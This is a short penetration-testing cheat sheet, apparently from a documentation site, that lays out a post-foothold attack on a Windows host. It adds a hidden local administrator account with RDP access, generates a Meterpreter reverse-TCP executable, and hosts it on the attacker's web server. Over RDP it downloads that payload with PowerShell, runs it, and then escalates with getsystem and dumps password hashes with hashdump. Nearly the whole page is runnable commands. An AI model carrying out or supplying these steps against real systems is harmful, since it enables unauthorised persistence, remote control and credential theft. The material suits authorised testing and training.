Add RDP Account & Ride on Meterpreter

with initial foothold

Remote Desktop

net user pentest Pen.TE$t2024!1 /ADD
net localgroup "Remote Desktop Users" pentest /add
net localgroup "Administrators" pentest /add

Payload generation

use payload/windows/meterpreter/reverse_tcp 
set lhost=10.9.254.6 
set lport=8888
generate -f exe -o /var/www/html/meterpreter.exe

Metasploit listener for meterpreter payload

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.254.6
set lport 8888
run

apache2ctl start

Connect via RDP to the victim and start powershell

$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"

Invoke-WebRequest -URI $URL -OutFile $Path

Start meterpreter.exe "As Administrator"

meterpreter> getsystem
meterpreter> hashdump

Last updated 1 year ago

Was this helpful?